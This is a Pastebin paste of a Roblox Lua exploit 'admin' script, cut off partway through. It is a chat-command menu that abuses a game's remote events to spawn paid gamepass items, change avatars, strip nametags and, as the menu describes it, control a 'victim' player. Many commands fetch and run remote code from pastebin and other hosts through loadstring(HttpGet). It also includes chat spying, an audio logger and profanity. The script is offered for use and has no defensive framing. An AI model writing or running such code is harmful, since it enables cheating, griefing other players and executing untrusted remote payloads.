Advertisement
Lollddsf

Untitled

Jan 16th, 2020
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.65 KB | None | 0 0
  1. IDFORSPAWNER = 12345678 --change to any gamepass id u made. If not MAKE ONE!!
  2. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "SuperFlyGoldBoombox")
  3. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  4. game:GetService("StarterGui"):SetCore("SendNotification", {
  5. Title = "g0tTr0LLeD Admin",
  6. Text = "Enjoy the admin you fuckers",
  7. Icon = "rbxassetid://940043029"})
  8. game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
  9. if msg:lower() == ".cmds" then
  10. print[[--
  11. -------------------------ADMIN BY g0tTr0LLeD#2270-------------------------
  12. .glock --gun that shoots
  13. .largemachinegun --gun that shoots
  14. .machinegun --gun that shoots
  15. .m24r --gun that shoots
  16. .uzi --gun that shoots
  17. .rtx --some admin
  18. .p --give you a penis
  19. .anchor --anchors you where you are (for annoying skids that like to fling)
  20. .unanchor --unanchors you so u can move around
  21. .control (playernamehere) --lets you control your victim (r6 needed)
  22. .size (number) --lets you change your size
  23. .ff --forcefield body
  24. .load --makes a loading. .. ... rp name
  25. .audio --audio logger
  26. .rhead --rainbow head
  27. .infj --gives you infinate jump
  28. .uninfj --disables infinate jump
  29. .head --remove head
  30. .ffhead --forcefields your head
  31. .fftorso --forcefields your torso
  32. .ffarms --forcefields your arms
  33. .fflegs --forcefields your legs
  34. .black --makes your character black
  35. .white --makes your character white
  36. .red --makes your character red
  37. .orange --makes your character orange
  38. .green --makes your character green
  39. .blue --makes your character blue
  40. .purple --makes your character purple
  41. .legs --removes legs
  42. .arms --removes arms
  43. .torso --removes torso
  44. .invis --makes your whole body invincible (edit the accessories to yours)
  45. .vis -- makes your character visible
  46. .rnametag --removes your VIP nametag
  47. .cooleyes --rainbow eyes
  48. .beast --gives you a rainbow beastmode face
  49. .militaryvehicle --vehicle (r6 reccomended)
  50. .admin --Infinate Yield
  51. .delta --delta admin
  52. .plane --a huge plane
  53. .cloud --gives cloud
  54. .stroller --gives stroller
  55. .blunt --gives you a blunt
  56. .noob --makes you a giant noob (r6 reccomended)
  57. .spy --chat spy
  58. .body --rainbow body
  59. re --reset
  60. .rj --rejoin
  61. ]]
  62. end
  63. if msg:lower() == ".blunt" then
  64. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  65. wait()
  66. loadstring(game:HttpGet("https://pastebin.com/raw/AKASDfGr"))()
  67. end
  68. game:GetService("UserInputService").JumpRequest:connect(function()
  69. if InfiniteJumpEnabled then
  70. game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping")
  71. end
  72. end)
  73. if msg:lower() == ".infj" then
  74. InfiniteJumpEnabled = true
  75. end
  76. if msg:lower() == ".uninfj" then
  77. InfiniteJumpEnabled = false
  78. end
  79. if msg:lower() == ".stroller" then
  80. game.Workspace.GiveTool:FireServer("IDFORSPAWNER", "Stroller")
  81. end
  82. if msg:lower() == ".glock" then
  83. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  84. wait()
  85. loadstring(game:HttpGet("https://pastebin.com/raw/Jj3Js1VL"))()
  86. end
  87. if msg:lower() == ".boombox" then
  88. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "SuperFlyGoldBoombox")
  89.  
  90. end
  91. if msg:lower() == ".anchor" then
  92. if game:GetService("Players").LocalPlayer.Character then
  93. for _, part in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do
  94. pcall(function()
  95. part.Anchored = true
  96. end)
  97. end
  98. end
  99. end
  100. if msg:lower() == ".unanchor" then
  101. if game:GetService("Players").LocalPlayer.Character then
  102. for _, part in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do
  103. pcall(function()
  104. part.Anchored = false
  105. end)
  106. end
  107. end
  108. end
  109. if msg:lower() == ".rnametag" then
  110. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  111.  
  112.  
  113. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  114. local Name = "NAME"-- NAME THE TOOL IF WANT
  115. local CE = {} -- DON'T EDIT
  116. local C = { -- DON'T EDIT
  117. workspace = game:GetService("Workspace"),
  118. players = game:GetService("Players")
  119. }
  120. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  121.  
  122.  
  123. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  124. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  125. end
  126.  
  127. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  128.  
  129. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  130. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  131. end
  132. if msg:lower() == ".vis" then
  133. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  134.  
  135.  
  136. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  137. local Name = "NAME"-- NAME THE TOOL IF WANT
  138. local CE = {} -- DON'T EDIT
  139. local C = { -- DON'T EDIT
  140. workspace = game:GetService("Workspace"),
  141. players = game:GetService("Players")
  142. }
  143. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  144.  
  145.  
  146. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  147. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  148. end
  149.  
  150. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  151.  
  152. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  153. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","0")
  154. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","0")
  155. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","0")
  156. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","0")
  157. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","0")
  158. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","0")
  159. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  160. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  161. end
  162. if msg:lower() == ".black" then
  163. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really black"))
  164. end
  165. if msg:lower() == ".white" then
  166. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("White"))
  167. end
  168. if msg:lower() == ".red" then
  169. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really red"))
  170. end
  171. if msg:lower() == ".orange" then
  172. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Deep orange"))
  173. end
  174. if msg:lower() == ".green" then
  175. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Lime green"))
  176. end
  177. if msg:lower() == ".blue" then
  178. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really blue"))
  179. end
  180. if msg:lower() == ".purple" then
  181. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Magenta"))
  182. end
  183. if msg:lower() == ".tan" then
  184. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Nougat"))
  185. end
  186. if msg:lower() == ".invis" then
  187. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  188.  
  189.  
  190. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  191. local Name = "NAME"-- NAME THE TOOL IF WANT
  192. local CE = {} -- DON'T EDIT
  193. local C = { -- DON'T EDIT
  194. workspace = game:GetService("Workspace"),
  195. players = game:GetService("Players")
  196. }
  197. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  198.  
  199.  
  200. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  201. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  202. end
  203.  
  204. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  205.  
  206. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  207. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","1")
  208. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","1")
  209. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","1")
  210. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","1")
  211. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","1")
  212. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","1")
  213. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  214. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  215. end
  216. if msg:lower() == ".torso" then
  217. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  218.  
  219.  
  220. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  221. local Name = "NAME"-- NAME THE TOOL IF WANT
  222. local CE = {} -- DON'T EDIT
  223. local C = { -- DON'T EDIT
  224. workspace = game:GetService("Workspace"),
  225. players = game:GetService("Players")
  226. }
  227. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  228.  
  229.  
  230. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  231. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  232. end
  233.  
  234. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  235.  
  236. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  237. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","1")
  238. end
  239. if msg:lower() == ".arms" then
  240. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  241.  
  242.  
  243. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  244. local Name = "NAME"-- NAME THE TOOL IF WANT
  245. local CE = {} -- DON'T EDIT
  246. local C = { -- DON'T EDIT
  247. workspace = game:GetService("Workspace"),
  248. players = game:GetService("Players")
  249. }
  250. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  251.  
  252.  
  253. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  254. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  255. end
  256.  
  257. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  258.  
  259. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  260. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","1")
  261. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","1")
  262. end
  263. if msg:lower() == ".legs" then
  264. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  265.  
  266.  
  267. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  268. local Name = "NAME"-- NAME THE TOOL IF WANT
  269. local CE = {} -- DON'T EDIT
  270. local C = { -- DON'T EDIT
  271. workspace = game:GetService("Workspace"),
  272. players = game:GetService("Players")
  273. }
  274. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  275.  
  276.  
  277. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  278. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  279. end
  280.  
  281. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  282.  
  283. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  284. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","1")
  285. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","1")
  286. end
  287. if msg:lower() == ".head" then
  288. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  289.  
  290.  
  291. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  292. local Name = "NAME"-- NAME THE TOOL IF WANT
  293. local CE = {} -- DON'T EDIT
  294. local C = { -- DON'T EDIT
  295. workspace = game:GetService("Workspace"),
  296. players = game:GetService("Players")
  297. }
  298. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  299.  
  300.  
  301. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  302. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  303. end
  304.  
  305. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  306.  
  307. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  308. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","1")
  309. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  310. end
  311. if msg:lower() == ".largemachinegun" then
  312. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  313. wait()
  314. loadstring(game:HttpGet("https://pastebin.com/raw/HRRY3dAf"))()
  315. end
  316. if msg:lower() == ".m24r" then
  317. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  318. wait()
  319. loadstring(game:HttpGet("https://pastebin.com/raw/dyQFawUZ"))()
  320. end
  321. if msg:lower() == ".p" then
  322. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  323. wait()
  324. loadstring(game:HttpGet("https://pastebin.com/raw/vG069WJg"))()
  325. end
  326. if msg:lower() == ".uzi" then
  327. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  328. wait()
  329. loadstring(game:HttpGet("https://pastebin.com/raw/wMpNpbed"))()
  330. end
  331. if msg:lower() == ".load" then
  332. while wait() do
  333. game.Workspace.GuiEvent:FireServer("Loading")
  334. wait(0.5)
  335. game.Workspace.GuiEvent:FireServer("Loading.")
  336. wait(0.5)
  337. game.Workspace.GuiEvent:FireServer("Loading..")
  338. wait(0.5)
  339. game.Workspace.GuiEvent:FireServer("Loading...")
  340. wait(0.5)
  341. end
  342. end
  343. if msg:lower() == ".rtx" then
  344. loadstring(game:HttpGet("https://vtrxgicv.000webhostapp.com/RTX.lua"))()
  345. end
  346. if msg:lower() == ".fflegs" then
  347. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  348. local UserName = game:GetService("Players").LocalPlayer.Name
  349. local Autoride = true
  350. local Name, ToolTip = "KTOOL", "Bodymesh"
  351. local CE = {}
  352. local Variables = {
  353. workspace = game:GetService("Workspace"),
  354. players = game:GetService("Players")
  355. }
  356. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  357.  
  358. function CE:FireEvent(ItemName, Object, Property, Value)
  359. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  360. end
  361.  
  362. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  363. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  364.  
  365. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  366.  
  367. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Material",Enum.Material.ForceField)
  368. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Material",Enum.Material.ForceField)
  369. end
  370. if msg:lower() == ".ffarms" then
  371. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  372. local UserName = game:GetService("Players").LocalPlayer.Name
  373. local Autoride = true
  374. local Name, ToolTip = "KTOOL", "Bodymesh"
  375. local CE = {}
  376. local Variables = {
  377. workspace = game:GetService("Workspace"),
  378. players = game:GetService("Players")
  379. }
  380. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  381.  
  382. function CE:FireEvent(ItemName, Object, Property, Value)
  383. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  384. end
  385.  
  386. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  387. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  388.  
  389. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  390.  
  391. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Material",Enum.Material.ForceField)
  392. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Material",Enum.Material.ForceField)
  393. end
  394. if msg:lower() == ".fftorso" then
  395. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  396. local UserName = game:GetService("Players").LocalPlayer.Name
  397. local Autoride = true
  398. local Name, ToolTip = "KTOOL", "Bodymesh"
  399. local CE = {}
  400. local Variables = {
  401. workspace = game:GetService("Workspace"),
  402. players = game:GetService("Players")
  403. }
  404. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  405.  
  406. function CE:FireEvent(ItemName, Object, Property, Value)
  407. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  408. end
  409.  
  410. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  411. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  412.  
  413. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  414.  
  415. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Material",Enum.Material.ForceField)
  416. end
  417. if msg:lower() == ".ffhead" then
  418. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  419. local UserName = game:GetService("Players").LocalPlayer.Name
  420. local Autoride = true
  421. local Name, ToolTip = "KTOOL", "Bodymesh"
  422. local CE = {}
  423. local Variables = {
  424. workspace = game:GetService("Workspace"),
  425. players = game:GetService("Players")
  426. }
  427. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  428.  
  429. function CE:FireEvent(ItemName, Object, Property, Value)
  430. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  431. end
  432.  
  433. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  434. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  435.  
  436. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  437.  
  438. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Material",Enum.Material.ForceField)
  439. end
  440. if msg:lower() == ".ff" then
  441. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  442. local UserName = game:GetService("Players").LocalPlayer.Name
  443. local Autoride = true
  444. local Name, ToolTip = "KTOOL", "Bodymesh"
  445. local CE = {}
  446. local Variables = {
  447. workspace = game:GetService("Workspace"),
  448. players = game:GetService("Players")
  449. }
  450. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  451.  
  452. function CE:FireEvent(ItemName, Object, Property, Value)
  453. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  454. end
  455.  
  456. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  457. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  458.  
  459. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  460.  
  461. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Material",Enum.Material.ForceField)
  462. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Material",Enum.Material.ForceField)
  463. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Material",Enum.Material.ForceField)
  464. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Material",Enum.Material.ForceField)
  465. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Material",Enum.Material.ForceField)
  466. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Material",Enum.Material.ForceField)
  467. end
  468. if msg:lower() == ".audio" then
  469. loadstring(game:HttpGet("https://vtrxgicv.000webhostapp.com/Audio%20Logger.lua"))()
  470. end
  471. if msg:lower() == ".vip" then
  472. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  473. local Name = "NAME"-- NAME THE TOOL IF WANT
  474. local CE = {} -- DON'T EDIT
  475. local C = { -- DON'T EDIT
  476. workspace = game:GetService("Workspace"),
  477. players = game:GetService("Players")
  478. }
  479. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  480.  
  481.  
  482. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  483. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  484. end
  485.  
  486. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  487.  
  488. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  489. while wait() do
  490. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Font","Cartoon")
  491. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","NOTVIP")
  492. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(255,0,0))
  493. wait(.0000000000000000001)
  494. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(75,0,130))
  495. wait(.0000000000000000001)
  496. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(255,165,0))
  497. wait(.0000000000000000001)
  498. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(0,0,255))
  499. wait(.0000000000000000001)
  500. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(0,128,0))
  501. wait(.0000000000000000001)
  502. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(0,128,0))
  503. wait(.0000000000000000001)
  504. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(0,0,255))
  505. wait(.0000000000000000001)
  506. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(255,165,0))
  507. wait(.0000000000000000001)
  508. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(75,0,130))
  509. wait(.0000000000000000001)
  510. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(255,0,0))
  511. wait(.0000000000000000001)
  512. end
  513. end
  514. if msg:lower() == ".rhead" then
  515. loadstring(game:HttpGet("https://vtrxgicv.000webhostapp.com/Rainbow%20head.lua"))()
  516. end
  517. if msg:lower() == ".rage" then
  518. while wait() do
  519. workspace.Face:FireServer("http://www.roblox.com/asset/?id=1392104198")
  520. wait()
  521. workspace.Face:FireServer("http://www.roblox.com/asset/?id=741260810")
  522. wait()
  523. workspace.Face:FireServer("http://www.roblox.com/asset/?id=400818835")
  524. wait()
  525. workspace.Face:FireServer("http://www.roblox.com/asset/?id=606495374")
  526. wait()
  527. workspace.Face:FireServer("http://www.roblox.com/asset/?id=2628286951")
  528. wait()
  529. end
  530. end
  531. if msg:lower() == ".eyes" then
  532. while wait() do
  533. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235875854")
  534. wait()
  535. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235876174")
  536. wait()
  537. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235876570")
  538. wait()
  539. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235877044")
  540. wait()
  541. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235877318")
  542. wait()
  543. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235878653")
  544. wait()
  545. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235878884")
  546. wait()
  547. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235879197")
  548. end
  549. end
  550. if msg:lower() == ".militaryvehicle" then
  551. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  552. wait()
  553. loadstring(game:HttpGet("https://pastebin.com/raw/wqwdqSDk"))()
  554. end
  555. if msg:lower() == ".fat" then
  556. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  557. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  558. local Name = "NAME"-- NAME THE TOOL IF WANT
  559. local CE = {} -- DON'T EDIT
  560. local C = { -- DON'T EDIT
  561. workspace = game:GetService("Workspace"),
  562. players = game:GetService("Players")
  563. }
  564. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  565.  
  566.  
  567. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  568. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  569. end
  570.  
  571. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  572.  
  573. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  574. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Shape","Ball")
  575. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Shape","Block")
  576. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Size",Vector3.new(2,2,2))
  577. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Shape","Ball")
  578. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Shape","Block")
  579. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Size",Vector3.new(2,2,2))
  580. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Shape","Ball")
  581. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Shape","Block")
  582. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Size",Vector3.new(2,2,2))
  583. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Shape","Ball")
  584. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Shape","Block")
  585. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Size",Vector3.new(2,2,2))
  586. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Shape","Badll")
  587. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Shape","Block")
  588. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Size",Vector3.new(2,2,2))
  589. CE:FireEvent("PompousTheCloud",MainUserW["Shirt"],"ShirtTemplate","rbxassetid://249458025")
  590. CE:FireEvent("PompousTheCloud",MainUserW["Pants"],"PantsTemplate","rbxassetid://280452751")
  591. end
  592. if msg:lower() == ".admin" then
  593. loadstring(game:HttpGet("https://pastebin.com/raw/tzTXmYf2"))()
  594. end
  595. if msg:lower() == ".delta" then
  596. loadstring(game:HttpGet(('http://genocide.monster/script_source'),true))()
  597. end
  598. if msg:lower() == ".plane" then
  599. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  600. wait()
  601. loadstring(game:HttpGet("https://pastebin.com/raw/sAN4RA2F"))()
  602. end
  603. if msg:lower() == ".cloud" then
